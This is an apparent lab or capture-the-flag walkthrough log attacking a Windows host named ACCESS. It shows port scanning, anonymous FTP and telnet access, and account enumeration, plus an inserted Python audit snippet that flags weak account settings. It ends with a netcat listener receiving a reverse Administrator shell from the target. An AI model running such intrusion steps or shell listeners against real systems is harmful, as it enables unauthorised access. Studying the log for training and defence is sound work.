┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.98
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:27 CST
Nmap scan report for 10.10.10.98
Host is up (0.48s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.17 seconds
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,23,80 -sC -sV --min-rate=1000 10.10.10.98
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:42 CST
Nmap scan report for 10.10.10.98
Host is up (1.5s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: -8h03m35s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.38 seconds
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.98 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:44 CST
Nmap scan report for 10.10.10.98
Host is up (0.63s latency).
All 65535 scanned ports on 10.10.10.98 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 21.60 seconds
┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
ftp: Can't connect to `10.10.10.98:49158': 连接超时
421 Service not available, remote server has closed connection.
229 Entering Extended Passive Mode (|||49158|)
ftp> exit
┌──(kali㉿offsec)-[~/Desktop]
└─$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

C:\Users\security>net user administrator
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/21/2018 10:01:12 PM
Password expires             Never
Password changeable          8/21/2018 10:01:12 PM
Password required            No
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/21/2024 8:40:32 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.

C:\Users\security>
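The `net user administrator` output above shows an active member of Administrators with "Password required No", which is the setting a host audit should catch. As an added example (not from the original post, which only shows the command output), this Python snippet parses the `net user` output format and reports that and related weak settings; the sample text is constructed from the fields shown above.

```python
import re

# Constructed sample in the format of `net user administrator`, trimmed to the
# fields the audit looks at (not captured from the original post)
NET_USER_OUTPUT = """\
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
Account active               Yes
Account expires              Never
Password last set            8/21/2018 10:01:12 PM
Password expires             Never
Password required            No
User may change password     No
Last logon                   5/21/2024 8:40:32 AM
Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.
"""


def parse_net_user(text):
    """Parse `net user <name>` output into a dict of field -> value.
    Key and value are separated by two or more spaces; lines with no value
    are dropped; *Name group lists become Python lists of names."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s{2,}(\S.*)$", line.rstrip())
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if value.startswith("*"):
            fields[key] = [t.strip() for t in value.split("*") if t.strip()]
        else:
            fields[key] = value
    return fields


def audit_account(fields):
    """Return the weak settings found on one parsed account. The finding
    worth alerting on is an active local administrator with no password
    required; the other two are lower-severity hygiene checks."""
    findings = []
    is_admin = "Administrators" in fields.get("Local Group Memberships", [])
    if (is_admin and fields.get("Account active") == "Yes"
            and fields.get("Password required") == "No"):
        findings.append("active local administrator with password not required")
    if fields.get("Password expires") == "Never":
        findings.append("password never expires")
    if fields.get("User may change password") == "No":
        findings.append("user cannot change own password")
    return findings
```

Feed it the output of `net user <name>` for each local account to get a per-account list of findings.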
17. The runas command: runas is a command that ships with Windows. It launches a program under a specified account and privilege level instead of simply inheriting the parent process's permissions. What it actually relies on is a credential.
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.98] 49163
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.